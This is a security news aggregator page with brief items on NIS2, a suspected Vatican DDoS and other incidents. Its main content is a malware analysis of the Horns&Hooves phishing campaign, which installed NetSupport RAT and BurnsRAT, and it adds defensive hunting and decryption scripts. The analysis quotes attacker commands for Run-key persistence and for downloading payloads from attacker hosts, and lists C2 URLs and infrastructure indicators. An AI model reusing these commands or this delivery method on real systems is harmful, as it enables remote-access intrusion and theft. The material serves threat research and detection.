Beyond classic managed security services: why invest in MDR


@Informatica (Italy e non Italy 😁)
Managed Detection and Response (MDR) services are redefining the cybersecurity landscape: an essential combination of continuous monitoring, advanced threat detection and rapid incident response, which also leverages



NIS2: the census of affected entities begins, everything you need to know


@Informatica (Italy e non Italy 😁)
From 1 December, entities affected by NIS2 can begin registering on the ACN’s digital platform, under penalty of sanctions. It is therefore necessary to understand which organisations are potentially



The long outage of the Vatican’s servers, the mysterious crash and the suspected DDoS


According to security experts, last week’s crash of the Vatican’s website bears the hallmarks of a cyber attack, highlighting the Vatican’s online exposure to possible interference by malicious actors.

Most of the Vatican’s website went down on 19 November and remained unreachable for several days in some parts of the world. Although the Vatican has not confirmed the origin of the problem, Vatican spokesman Matteo Bruni hinted that Vatican officials themselves suspect an attack on their web servers.

Bruni said that the servers experienced an “anomalous number of interactions” which, combined with the countermeasures deployed, led to a series of cascading effects on the Church’s IT infrastructure.

Experts consider the anomalous number of interactions consistent with a DDoS attack, although the source of such an attack is unclear. Within the Vatican, some suspected that a cyber attack may have been timed to coincide with the 20 November visit of Ukrainian First Lady Olena Zelenska.

If the outage was caused by a cyber attack, it would be the latest in a long series of politically motivated attacks against the Vatican. In 2015, the personal data of Vatican Radio journalists and the Vatican website were hacked twice by the hacker group Anonymous.

In 2018, both the Vatican and the Diocese of Hong Kong were hit by the RedDelta hackers, allegedly backed by the Chinese regime, ahead of talks to renew a provisional agreement on episcopal appointments. In 2022, the Vatican website was taken offline the day after the Pope criticised Russia’s invasion of Ukraine.

DDoS attacks are usually carried out by botnets that overwhelm a server with the sheer volume of requests. Their aim is not to access private information but simply to knock a website offline so that users cannot reach it.

Charles Brooks, a former DHS official and professor of cybersecurity at Georgetown University, led a group of Catholic cybersecurity experts who in May 2023 urged the Holy See to create a “Vatican Cybersecurity Authority”, out of concern over weaknesses in the Vatican’s digital infrastructure.

Although DDoS attacks usually originate from large-scale campaigns, many experts believe that in the Vatican’s case the source is hard to pin down because of the vulnerability of its web servers. Andrew Jenkinson, CEO of the British cybersecurity company CIP, told The Pillar that he had been trying to warn the Holy See about its cybersecurity vulnerabilities since at least 2020.

Jenkinson showed The Pillar an analysis of critical Vatican servers that had been flagged as insecure and said that the DNS (Domain Name System) was exposed. “When we tried to assist them in 2020 and 2021, over 90% of their websites were rated Not Secure. There is no excuse for such basic security failures,” Jenkinson told The Pillar.

The article The long outage of the Vatican’s servers, the mysterious crash and the suspected DDoS comes from il blog della sicurezza informatica.



Cyber attacks: when their effectiveness also comes from the unawareness of those on the receiving end


Cyber security is, first and foremost, a cultural challenge. Italian companies can no longer afford to treat it as a purely technical matter. It is important to adopt an integrated approach in which technology, regulation and training together create a safer and more resilient environment

The article Cyber attacks: when their effectiveness also comes from the unawareness of those on the receiving end comes from Cyber Security 360.



Deepfake and ransomware attacks: Italy in the crosshairs


@Informatica (Italy e non Italy 😁)
The new Tinexta Cyber report shows a decline in victims, including in Italy where the drop is in double digits, but cyber gangs are multiplying and the number of countries targeted is widening. Here are the main risks according to the Risk Report 2024 and how to protect yourself
The article Deepfake and ransomware attacks: Italy



NIS2 Directive: the operational phase begins, and let no one be left behind


The presentation of the NIS2 registration platform, which kicks off the adjustments required by the European directive, was a moment of training and information for all national stakeholders. Things are getting serious, and the goal is to raise the cyber posture of the country as a whole

The article NIS2 Directive: the operational phase begins, and let no one be left behind comes from Cyber Security 360.




North Korean hackers steal billions in cryptocurrency: sophisticated tactics to fund the regime


The cyber attacks carried out by North Korean cyber gangs represent an unprecedented threat to the cryptocurrency sector and to global financial security. This is why it is urgent to strengthen cyber defences and develop coordinated international strategies to prevent future attacks

The article North Korean hackers steal billions in cryptocurrency: sophisticated tactics to fund the regime comes from Cyber Security 360.




How the Matrix gang uses DDoS attacks to hit IoT and enterprise systems: the impacts


@Informatica (Italy e non Italy 😁)
Malicious activity by the Matrix cyber gang has been identified which, through DDoS attacks, is targeting misconfigured or unpatched IoT and enterprise systems. Here are all the details and the implications for




Horns&Hooves campaign delivers NetSupport RAT and BurnsRAT



Recent months have seen a surge in mailings with lookalike email attachments in the form of a ZIP archive containing JScript scripts. The script files – disguised as requests and bids from potential customers or partners – bear names such as “Запрос цены и предложения от Индивидуального предпринимателя <ФИО> на август 2024. АРТ-КП0005272381.js” (Request for price and proposal from sole trader <name> for August 2024. ART-KP0005272381.js), “Запрос предложений и цен от общества с ограниченной ответственностью <предприятие> на сентябрь 2024. отэк-мн0008522309.js” (Request for proposals and prices from LLC <company> for September 2024. Otek-mn0008522309.js), and the like.

Examples of malicious emails

According to our telemetry, the campaign began around March 2023 and hit more than a thousand private users, retailers and service businesses located primarily in Russia. We dubbed this campaign Horns&Hooves, after a fictitious organization set up by swindlers in the Soviet comedy novel The Golden Calf.

Statistics

Chart: number of users who encountered the malicious script, by month, March 2023 to September 2024

Malicious scripts


During the campaign, the threat actors made some major changes to the script, while keeping the same distribution method. In almost all cases, a JS script named “Заявка на закупку…” (“Purchase request…”), “Запрос цен…” (“Request for quote…”), or similar was sent in a ZIP archive. Far more rarely, the scripts were called “Акт сверки…” (“Reconciliation statement…”), “Заявление на возврат…” (“Request for refund…”), “Досудебная претензия…” (“Letter of claim…”) or just “Претензия…” (“Claim…”). The earliest versions that we encountered in April and May used scripts with the HTA extension instead of JS scripts.

For believability, besides the script, the attackers sometimes added to the archive various documents related to the organization or individual being impersonated. For example, an archive attached to a booking cancellation email contained a PDF file with a copy of a passport; while price request emails had extracts from the Russian Unified State Register of Legal Entities, certificates of tax registration and company cards in attachment. Below, we examine several versions of the scripts used in this campaign.

Typical archive contents

Version A (HTA)


Some of the first sample scripts we saw in April and early May 2023 were relatively small in size. As an example, we analyzed a sample with the MD5 hash sum 327a1f32572b4606ae19085769042e51.

First version of the malicious script in attachment

When run, the script downloads a decoy document from linkpicture[.]com/q/1_1657.png in the form of a PNG image, which it then shows to the user. In this case, the image looks like a screenshot of a table listing items for purchase. It may have been taken from a previously infected machine.

Decoy document in PNG format

Note that PNG decoy documents are rather unconventional. Usually, bids and requests that are used to distract user attention from malware are distributed in office formats such as DOCX, XLSX, PDF and others. The most likely reason for using PNG is that in the very first versions the attackers hid the payload at the end of the bait file. PNG images make convenient containers because they continue to display correctly even after data is appended to them.

To download the decoy document, the attackers use the curl utility, which comes preinstalled on devices with Windows 10 (build 17063 and higher). Together with the document, using another built-in Windows utility, bitsadmin, the script downloads and runs the BAT file bat_install.bat to install the main payload. The script also makes use of bitsadmin for managing file transfer tasks.

Snippet of the BAT script that installs the payload

Using bitsadmin, the BAT script first downloads from the attackers’ address hxxps://golden-scalen[.]com/files/, and then installs, the following files:

File name         Description
AudioCapture.dll  NetSupport Audio Capture
client32.exe      NetSupport client named CrossTec
client32.ini      Configuration file
HTCTL32.DLL       NetSupport utility for HTTP data transfer
msvcr100.dll      Microsoft C runtime library
nskbfltr.inf      Windows Driver Frameworks configuration file for installing additional drivers
NSM.LIC           NetSupport license file
nsm_vpro.ini      Additional NSM settings
pcicapi.dll       pcicapi file from the NetSupport Manager package
PCICHEK.DLL       CrossTec VueAlert PCIChek
PCICL32.DLL       NetSupport client as a DLL
remcmdstub.exe    CrossTec remote command line
TCCTL32.DLL       NetSupport utility for TCP data transfer

To download the required file, bat_install.bat appends its name to the end of the URL. The script saves the downloaded files to the user directory %APPDATA%\VCRuntineSync.

The payload is the legitimate NetSupport Manager (NSM) tool for remote PC management. This software is often used in corporate environments for technical support, employee training and workstation management. However, due to its capabilities, it is regularly exploited by all kinds of cybergangs. The versions and modifications of this software seen in cyberattacks and providing a stealth run mode have been dubbed NetSupport RAT.

Most often, NetSupport RAT infiltrates the system through scam websites and fake browser updates. In December 2023, we posted a report on one such campaign that installed NetSupport RAT under the guise of a browser update after the user visited a compromised website.

After the file download, the bat_install.bat script runs the client32.exe file and adds it to the startup list:

    start /B cmd /C "start client32.exe & exit"
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "VCRuntineSync" /t REG_SZ /d '%APPDATA%\VCRuntineSync\client32.exe' /f

And, in case the HTA script failed, the BAT script attempts to download and run the bait file.

When NetSupport RAT is run, it establishes a connection to one of the attackers’ servers set in the client32.ini configuration file: the main one, xoomep1[.]com:1935, or the backup one, xoomep2[.]com:1935.

The client32.ini configuration file

Version A infection chain

Version B (JS + NSM)


A bit later, in mid-May 2023, there appeared versions of the script mimicking legitimate JS files.

JS version of the malicious script in attachment

The code of this script contains a comment from the publicly available JavaScript library Next.js with license and copyright information. This way, the attackers try to make the code appear legitimate. The malicious code is inserted into the middle of the file, where a cursory inspection would miss it, yet it is still executed at runtime.

In terms of functionality, the JS versions of the script are virtually the same as the HTA ones. They too show a decoy document and install NetSupport RAT. But there are some differences. For example, the script with the hash sum b3bde532cfbb95c567c069ca5f90652c, which we found under the filename “досудебная претензия от 18.05.2023 №5 от компании ооо <НАЗВАНИЕ_КОМПАНИИ>.js” (“Letter of claim No. 5, dated May 18, 2023, from LLC <company>.js”), first downloads an intermediate JS script from the address hxxp://188[.]227[.]58[.]243/pretencia/www.php.

Second script contents

This second script downloads two more files: the decoy document zayavka.txt and the NetSupport RAT installer installer_bat_vbs.bat. Like PNG images, decoy documents in TXT format are not standard practice. And with this version, the files contain generated text in Russian that is meaningless and repeated several times, using different characters that look vaguely Cyrillic. They would appear to be the first tests of the new bait file format.

Decoy document with meaningless text

After downloading the files, the www.php script opens the text document and runs the NetSupport RAT installer, which it saves with the name BLD.bat. To download the NetSupport components, the script uses the same path as version A: hxxps://golden-scalen[.]com/files/. Unlike the previous version, this script downloads the files to the %APPDATA%\EdgeCriticalUpdateService directory. Correspondingly, the autorun registry key used by this version is named EdgeCriticalUpdateService. Also, the BLD.bat file contains no redundant code for re-downloading the bait file.
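The version A and B chains above leave a recognisable trail in endpoint telemetry: a script host (mshta.exe or wscript.exe) spawning curl or bitsadmin, a reg.exe Run-key entry named VCRuntineSync or EdgeCriticalUpdateService, and client32.exe starting from under %APPDATA%. The following hunting script is an added example, not Kaspersky's tooling, that checks constructed process-creation records (shaped like Sysmon Event ID 1 fields: ParentImage, Image, CommandLine) for exactly those indicators. The sample events, including their command lines, are constructed for the demo; only the names and paths named in the write-up are taken from it.

```python
"""Hunt for the Horns&Hooves loader chain (versions A and B) in process telemetry.

Added example, not code from the Securelist post. It looks for the
living-off-the-land steps described there: script host -> curl/bitsadmin,
reg.exe writing a Run value named VCRuntineSync / EdgeCriticalUpdateService,
and NetSupport's client32.exe executing from %APPDATA%.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # ParentImage (full path)
    image: str     # Image (full path)
    cmdline: str   # CommandLine


SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
DOWNLOADERS = {"curl.exe", "bitsadmin.exe"}
# Run-value names used by versions A and B, as stated in the write-up
RUN_NAMES = {"vcruntinesync", "edgecriticalupdateservice"}
RUN_VALUE_RE = re.compile(r'CurrentVersion\\Run"?\s+/v\s+"?([^"\s]+)', re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (forward slashes tolerated)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: ProcEvent) -> list:
    """Return the findings (strings) a single process event triggers, if any."""
    findings = []
    parent, image = basename(ev.parent), basename(ev.image)
    if parent in SCRIPT_HOSTS and image in DOWNLOADERS:
        findings.append(f"{parent} spawned {image} (script-host download)")
    if image == "bitsadmin.exe" and re.search(r"/transfer\b", ev.cmdline, re.I):
        findings.append("bitsadmin /transfer used to fetch a file")
    if image == "reg.exe":
        m = RUN_VALUE_RE.search(ev.cmdline)
        if m and m.group(1).lower() in RUN_NAMES:
            findings.append(f"Run-key persistence named {m.group(1)}")
    if image == "client32.exe" and "\\appdata\\" in ev.image.lower():
        findings.append("NetSupport client32.exe executing from %APPDATA%")
    return findings


def hunt(events) -> dict:
    """Map event index -> findings for every event that triggered a check."""
    return {i: f for i, ev in enumerate(events) if (f := check_process(ev))}


# Constructed sample telemetry (not real logs from the campaign); URLs defanged.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\curl.exe",
              r'curl -o "%TEMP%\1_1657.png" hxxps://linkpicture[.]com/q/1_1657.png'),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer upd /download /priority normal "
              r"hxxp://31[.]44[.]4[.]40/test/bat_install.bat %TEMP%\bat_install.bat"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r'reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "VCRuntineSync" '
              r'/t REG_SZ /d "%APPDATA%\VCRuntineSync\client32.exe" /f'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Users\user\AppData\Roaming\VCRuntineSync\client32.exe", "client32.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # benign
]

if __name__ == "__main__":
    for idx, found in hunt(SAMPLE_EVENTS).items():
        print(idx, found)
```

Each check is deliberately narrow (a specific parent/child pair, a specific Run-value name) so it can be run over a day of process events without drowning in benign curl or reg.exe activity; widen RUN_NAMES as new persistence names appear in later versions.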

Version B infection chain

Version C (JS + BurnsRAT)


Another interesting sample we found in mid-May had the name “заявка на закупки №113 от компании <НАЗВАНИЕ_КОМПАНИИ> на май 2023 года.js” (“procurement request No. 113 from <company> for May 2023.js”) and the MD5 hash sum 5f4284115ab9641f1532bb64b650aad6.

Fully obfuscated version of the malicious script

Here, we also see a comment with license and copyright information about the Next.js library, but there is nothing left of the library source code. The malicious code itself is more heavily obfuscated, and the link to the intermediate script hxxp://188[.]227[.]106[.]124/test/js/www.php is invisible to the naked eye.

Second script contents

In this version, the intermediate script downloads three more files: the decoy document zayavka.txt, the payload BLD.exe, and the auxiliary script 1.js. The decoy document in this instance looks more meaningful, and is likely the result of a screenshot-to-text conversion.

Decoy document

Having loaded the files, the www.php script opens the decoy document and runs the 1.js file, which in turn launches the BLD.exe file.

What’s most striking about this instance is the payload.

BLD.exe (MD5: 20014b80a139ed256621b9c0ac4d7076) is an NSIS installer that creates a Silverlight.7z archive in the %PROGRAMDATA%\Usoris\LastVersion folder and extracts several files from it:

File name                      Description
libeay32.dll                   OpenSSL shared library
msimg32.dll                    Malicious loader
settings.dat                   RMS configuration file
Silverlight.Configuration.exe  Legitimate Microsoft Silverlight Configuration Utility
ssleay32.dll                   OpenSSL shared library
w32.dat                        Archive with RDP Wrapper (32-bit)
w64.dat                        Archive with RDP Wrapper (64-bit)
WUDFHost.exe                   Remote Manipulator System

The next step is to run the legitimate Silverlight.Configuration.exe file. When launched, it loads the dynamic libraries (DLLs) that the program needs using a relative path. This opens the door to a DLL side-loading attack: the malicious msimg32.dll library is placed in the same directory as the utility, so the malicious library is loaded and gains control instead of the system one. Although the backdoor supports commands for remotely downloading and running files, as well as various ways of executing commands via the Windows command line, the main task of this component is to start the Remote Manipulator System (RMS) as a service and send the RMS session ID to the attackers’ server:

    svchost.exe -k "WUDFHostController" -svcr "WUDFHost.exe"
On top of that, msimg32.dll sends information about the computer to the server hxxp://193[.]42[.]32[.]138/api/.

Outgoing request to the server

The sent data is encrypted using the RC4 algorithm with the Host value as the key, which in this case is the IP address of the server, 193.42.32[.]138.

System information sent by the library
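Because RC4 is a symmetric stream cipher and the post states that the key is the Host value of the request (the C2 IP address), a responder who captures one of these beacons can decrypt it with nothing more than the Host header. The snippet below is an added example, not the malware's code or Kaspersky's tooling: a plain RC4 implementation plus a decrypt helper keyed on the Host string. The beacon body is constructed locally for the demo, its field layout is illustrative (the page does not describe the real format), and treating the IP as its ASCII string is an assumption.

```python
"""RC4 round trip for the BurnsRAT loader beacon described above.

Added example, not from the Securelist post. msimg32.dll is reported to
RC4-encrypt the collected system information using the HTTP Host value as
the key; the same key therefore decrypts a captured request body.
"""


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). One function both encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Host header value named as the key in the write-up (printed defanged there).
# Using its ASCII representation as the key bytes is an assumption.
C2_HOST = "193.42.32.138"


def decrypt_beacon(host: str, body: bytes) -> str:
    """Decrypt a captured beacon body with the request's Host header as the key."""
    return rc4(host.encode(), body).decode("utf-8", errors="replace")


# Constructed sample beacon (field names are illustrative, not the real layout).
SAMPLE_PLAINTEXT = "hostname=WKS-01;user=ivanov;os=Windows 10;id=123456789"
SAMPLE_BODY = rc4(C2_HOST.encode(), SAMPLE_PLAINTEXT.encode())

if __name__ == "__main__":
    print("captured body:", SAMPLE_BODY.hex())
    print("decrypted    :", decrypt_beacon(C2_HOST, SAMPLE_BODY))
```

The same construction explains why the post can name the key at all: it is sent in the clear in every request, so the "encryption" only hides the system profile from casual inspection, not from anyone holding the capture.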

RMS is an application that allows users to interact with remote systems over a network. It provides the ability to manage the desktop, execute commands, transfer files and exchange data between devices located in different geographic locations. Typically, RMS uses encryption technologies to protect data and can run on a variety of operating systems. The RMS build distributed by the attackers is also called BurnsRAT.

RMS has support for connecting to a remote computer via Remote Desktop Protocol (RDP), so besides the application itself and files for running it, the NSIS installer saves to the device the w32.dat and w64.dat archives, which contain a set of libraries created using RDP Wrapper to activate additional RDP features.

RDP Wrapper is a program for enabling remote desktop features in Windows editions that do not support them by default, such as Windows Home; it also allows multiple users to connect to one system simultaneously.

At its core, RMS is a close analog of NetSupport, but the RMS payload did not gain traction.

BurnsRAT infection chain

Version D (JS + Hosted NSM ZIP)


A few more characteristic changes in the scripts caught our eye in late May 2023. Let’s examine them using a file named “purchase request from LLC <company> No. 3.js” with hash sum 63647520b36144e31fb8ad7dd10e3d21 as an example. The initial script itself is very similar to version B and differs only in the link to the second script, hxxp://45[.]133[.]16[.]135/zayavka/www.php. But unlike version B, the BAT file for installing NetSupport RAT has been completely rewritten.

BAT script contents

In this version, it is located at hxxp://45[.]133[.]16[.]135/zayavka/666.bat, and to install NetSupport it downloads an intermediate PowerShell script hxxp://45[.]133[.]16[.]135/zayavka/1.yay, which in turn downloads and unpacks the NetSupport RAT archive from hxxp://golden-scalen[.]com/ngg_cl.zip. The contents of the archive are identical in every way to the NetSupport version installed by the version B script.

PowerShell script contents

Version D infection chain

Version E (JS + Embedded NSM ZIP)


The next notable, but less fundamental changes appeared in June 2023. Instead of downloading the encoded ZIP archive with NetSupport RAT, the attackers began placing it inside the script. This caused the script to increase in size. In addition, the comment in the file header was replaced with one from the Backbone.js library.

Snippet of the third version of the script

Starting around September 2023, the NetSupport RAT files were split into two archives; and since February 2024, instead of text bait files, the attackers have been striving for greater plausibility by using PDF documents which were also contained in the script code.
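When the archive travels inside the script rather than being fetched from a server, the analyst's first job is to carve it back out. The carver below is an added example, not Kaspersky's tooling. The post does not name the encoding, so the carver assumes base64 (the usual choice for binaries embedded in text) and only accepts a candidate after checking the ZIP local-file-header magic, so a wrong guess yields an empty result rather than garbage. It also handles the later split into two archives, since every qualifying run in the file is reported. The script it runs on is constructed here to mimic the layout (library-header comment, then the embedded blobs); the member names are taken from the file tables above, their contents are dummies.

```python
"""Carve embedded ZIP archives out of a version E style script.

Added example, not from the Securelist post. Assumes base64 text encoding
(not stated on the page) and validates each hit by ZIP magic before listing
its members.
"""
import base64
import binascii
import io
import re
import zipfile

# A long run of base64 alphabet characters with optional padding.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")
ZIP_MAGIC = b"PK\x03\x04"


def carve_zips(script: bytes) -> list:
    """Return [(offset, member_names)] for every base64 run that decodes to a ZIP."""
    hits = []
    for m in B64_RUN.finditer(script):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue                       # not valid base64, move on
        if not blob.startswith(ZIP_MAGIC):
            continue                       # decoded, but not a ZIP
        try:
            with zipfile.ZipFile(io.BytesIO(blob)) as zf:
                hits.append((m.start(), zf.namelist()))
        except zipfile.BadZipFile:
            continue                       # magic matched but archive is broken
    return hits


def _zip_bytes(members: dict) -> bytes:
    """Build an in-memory ZIP from {name: data}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_script() -> bytes:
    """Constructed stand-in for a version E script with two embedded archives.

    Member names follow the NetSupport file tables in the write-up; the
    contents are dummy bytes, not real components.
    """
    part1 = _zip_bytes({"client32.exe": b"MZ" + b"\0" * 400,
                        "client32.ini": b"[HTTP]\nGSK=constructed\n"})
    part2 = _zip_bytes({"NSM.LIC": b"licensee=DERTERT\nserial_no=NSM386098\n",
                        "PCICL32.DLL": b"MZ" + b"\0" * 400})
    return (b"/* Backbone.js library header comment, as carried by version E scripts */\n"
            b'var p1 = "' + base64.b64encode(part1) + b'";\n'
            b'var p2 = "' + base64.b64encode(part2) + b'";\n'
            b"// decode, write to %APPDATA%, run client32.exe (dropper logic omitted)\n")


if __name__ == "__main__":
    for offset, names in carve_zips(build_sample_script()):
        print(f"ZIP at offset {offset}: {names}")
```

If nothing is carved from a real sample, the encoding is not plain base64 (an XOR layer or a custom alphabet are common variations) and the dropper's own decode routine has to be read first; the magic check is what keeps that failure loud.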

Version E decoy document

Version E infection chain

Attribution


All NetSupport RAT builds detected in the campaign contained one of three license files with the following parameters:

File 1   licensee=HANEYMANEY      serial_no=NSM385736
File 2   licensee=DCVTTTUUEEW23   serial_no=NSM896597
File 3   licensee=DERTERT         serial_no=NSM386098

License files

These license files were also used in various other unrelated campaigns. For instance, they’ve been seen in mailings targeting users from other countries, such as Germany. And they’ve cropped up in NetSupport RAT builds linked to the TA569 group (also known as Mustard Tempest or Gold Prelude). Note that licenses belonging to HANEYMANEY and DCVTTTUUEEW23 featured in the Horns&Hooves campaign for a short span before being completely dislodged by a license issued in the name of DERTERT three months later.

                                              HANEYMANEY   DCVTTTUUEEW23   DERTERT
Date of creation in the comment in the file   2022.07.17   2014.03.29      2017.07.26
Date from the file attributes in the archive  2022.07.17   2023.03.29      2022.07.26
Observed as part of the campaign              2023.04.17   2023.05.28      2023.07.09

The fact that Horns&Hooves uses the same licenses as TA569 led us to suspect a possible connection between the two. That said, because license files alone are insufficient to attribute malicious activity to TA569, we decided to look for other similarities. And so we compared the various configuration files that featured in the Horns&Hooves campaign and those used by TA569 – and found them to be near identical. As an example, let’s consider the Horns&Hooves configuration file (edfb8d26fa34436f2e92d5be1cb5901b) and the known configuration file of the TA569 group (67677c815070ca2e3ebd57a6adb58d2e).

Comparing the Horns&Hooves and TA569 configuration files

As we can see, everything matches except the domains and ports. The Gateway Security Key (GSK) field warrants special attention. The fact that the values match indicates that the attackers use the same security key to access the NetSupport client. And this means that the C2 operators in both cases most likely belong to TA569.

We checked if the key GSK=GF<MABEF9G?ABBEDHG:H had been seen in other campaigns that could not be attributed to either Horns&Hooves or TA569, and found none. Besides this key, we encountered another value in the Horns&Hooves campaign, GSK=FM:N?JDC9A=DAEFG9H<L>M; and in later versions there appeared one more version of the key, which was set with the parameter SecurityKey2=dgAAAI4dtZzXVyBIGlsJn859nBYA.
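The attribution argument above rests on a mechanical comparison: parse two client32.ini files, discard the fields that legitimately differ per deployment (gateway host and port), and see whether everything else, the GSK in particular, lines up. The helper below is an added example, not Kaspersky's tooling, that performs that comparison and also pulls licensee/serial_no out of an NSM.LIC-style file so new samples can be checked against the three licenses listed above. The section and key names in the constructed samples ([HTTP] with GatewayAddress, GSK, SecurityKey2; a [Client] section with a couple of illustrative options) are an assumption about the file layout; the GSK and SecurityKey2 values are the ones quoted in the text, the gateway hosts are the C2 domains listed in the IOCs, and the TA569 port is made up for the demo.

```python
"""Compare NetSupport client32.ini files the way the attribution section does.

Added example, not from the Securelist post. Deployment-specific gateway
fields are ignored; everything else (GSK, SecurityKey2, client options) is
compared key by key. INI layout is an assumption, see lead-in.
"""
import configparser

# Keys that differ per deployment and are excluded from the comparison.
GATEWAY_KEYS = {"gatewayaddress", "gatewayaddress2", "port", "secondaryport"}


def parse_ini(text: str) -> dict:
    """Flatten an INI into {'section.option': value}; only '=' is a delimiter
    because GSK values contain ':' and '?' and may contain '='."""
    cp = configparser.RawConfigParser(delimiters=("=",), strict=False)
    cp.read_string(text)
    return {f"{s.lower()}.{k}": v.strip() for s in cp.sections() for k, v in cp.items(s)}


def compare_configs(a: str, b: str):
    """Return (matching_keys, differing_keys), ignoring gateway host/port fields."""
    da, db = parse_ini(a), parse_ini(b)
    keys = {k for k in da.keys() | db.keys() if k.split(".", 1)[1] not in GATEWAY_KEYS}
    same = sorted(k for k in keys if da.get(k) == db.get(k))
    diff = sorted(k for k in keys if da.get(k) != db.get(k))
    return same, diff


def parse_lic(text: str) -> dict:
    """Pull licensee and serial_no out of an NSM.LIC-style key=value file."""
    found = {}
    for line in text.splitlines():
        if "=" in line and not line.lstrip().startswith(";"):
            k, v = line.split("=", 1)
            found[k.strip().lower()] = v.strip()
    return {k: found.get(k) for k in ("licensee", "serial_no")}


# Constructed samples. Client options are illustrative; GSK/SecurityKey2 and
# the gateway domains come from the write-up, the TA569 port is made up.
HH_INI = """[Client]
silent=1
SysTray=0
[HTTP]
GatewayAddress=xoomep1.com:1935
GatewayAddress2=xoomep2.com:1935
GSK=GF<MABEF9G?ABBEDHG:H
SecurityKey2=dgAAAI4dtZzXVyBIGlsJn859nBYA
"""

TA569_INI = HH_INI.replace("xoomep1.com:1935", "shetrn1.com:443") \
                  .replace("xoomep2.com:1935", "shetrn2.com:443")

# Same campaign, different GSK (the second key value quoted in the text).
HH_INI_ALT = HH_INI.replace("GSK=GF<MABEF9G?ABBEDHG:H", "GSK=FM:N?JDC9A=DAEFG9H<L>M")

LIC_DERTERT = "licensee=DERTERT\nserial_no=NSM386098\n"   # fields from the license table

if __name__ == "__main__":
    same, diff = compare_configs(HH_INI, TA569_INI)
    print("matching:", same)
    print("differing:", diff)
    print(parse_lic(LIC_DERTERT))
```

A match on GSK alone is the strong signal here: the gateway hosts are expected to change between operations, but a shared Gateway Security Key means the same operator infrastructure can accept both clients, which is the inference the post draws.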

What happens after RMS or NetSupport RAT is installed


The installation of BurnsRAT or NetSupport RAT is only an intermediate link in the attack chain, giving remote access to the computer. In a number of cases, we observed attempts to use NetSupport RAT to install stealers such as Rhadamanthys and Meduza. However, TA569 generally sells access to infected computers to other groups, for example, to install ransomware Trojans.

But it’s possible that the attackers may collect various documents and email addresses to further develop the campaign, since the earliest scripts distributed Rhadamanthys instead of NetSupport RAT.

Takeaways


This post has looked in detail at several ways of delivering and using legitimate software for malicious purposes as part of a sustained campaign. Over the course of the campaign, the attackers changed some of their tactics and experimented with new tools. For instance, they gradually moved away from using additional servers to deliver the payload, leaving only two as a result, which the remote administration software itself uses. Also, the attackers initially weaponized BurnsRAT, but then abandoned it and placed all the program code for installing and running NetSupport RAT in a single script. They probably found this approach more efficient in terms of both development and difficulty of detection.

We were able to determine with a high degree of certainty that the campaign is linked to the TA569 group, which gains access to organizations and then sells it to other cybercriminals on the dark web. Depending on whose hands this access falls into, the consequences for victim companies can range from data theft to encryption and damage to systems. We also observed attempts to install stealers on some infected machines.

Indicators of compromise

Malicious file hashes


Version A
327a1f32572b4606ae19085769042e51 — HTA
34eb579dc89e1dc0507ad646a8dce8be — bat_install.bat

Version B
b3bde532cfbb95c567c069ca5f90652c — JS
29362dcdb6c57dde0c112e25c9706dcf — www.php
882f2de65605dd90ee17fb65a01fe2c7 — installet_bat_vbs.bat

Version C
5f4284115ab9641f1532bb64b650aad6 — JS
0fea857a35b972899e8f1f60ee58e450 — www.php
20014b80a139ed256621b9c0ac4d7076 — BLD.exe
7f0ee078c8902f12d6d9e300dabf6aed — 1.js

Version D
63647520b36144e31fb8ad7dd10e3d21 — JS
8096e00aa7877b863ef5a437f55c8277 — www.php
12ab1bc0989b32c55743df9b8c46af5a — 666.bat
50dc5faa02227c0aefa8b54c8e5b2b0d — 1.yay
e760a5ce807c756451072376f88760d7 — ngg_cl.zip

Version E
b03c67239e1e774077995bac331a8950 — 2023.07
ba69cc9f087411995c64ca0d96da7b69 — 2023.09
051552b4da740a3af5bd5643b1dc239a — 2024.02

BurnsRAT C&C
hxxp://193[.]42[.]32[.]138/api/
hxxp://87[.]251[.]67[.]51/api/

Links, version A
hxxp://31[.]44[.]4[.]40/test/bat_install.bat
hxxps://golden-scalen[.]com/files/*

Links, version B
hxxp://188[.]227[.]58[.]243/pretencia/www.php
hxxp://188[.]227[.]58[.]243/zayavka/www.php
hxxp://188[.]227[.]58[.]243/pretencia/installet_bat_vbs.bat
hxxps://golden-scalen[.]com/files/*

Links, version C
hxxp://188[.]227[.]106[.]124/test/js/www.php
hxxp://188[.]227[.]106[.]124/test/js/BLD.exe
hxxp://188[.]227[.]106[.]124/test/js/1.js

Links, version D
hxxp://45[.]133[.]16[.]135/zayavka/www.php
hxxp://45[.]133[.]16[.]135/zayavka/666.bat
hxxp://45[.]133[.]16[.]135/zayavka/1.yay
hxxp://golden-scalen[.]com/ngg_cl.zip

Client32.ini for Horns&Hooves
edfb8d26fa34436f2e92d5be1cb5901b
3e86f6fc7ed037f3c9560cc59aa7aacc
ae4d6812f5638d95a82b3fa3d4f92861

Client32.ini known to belong to TA569
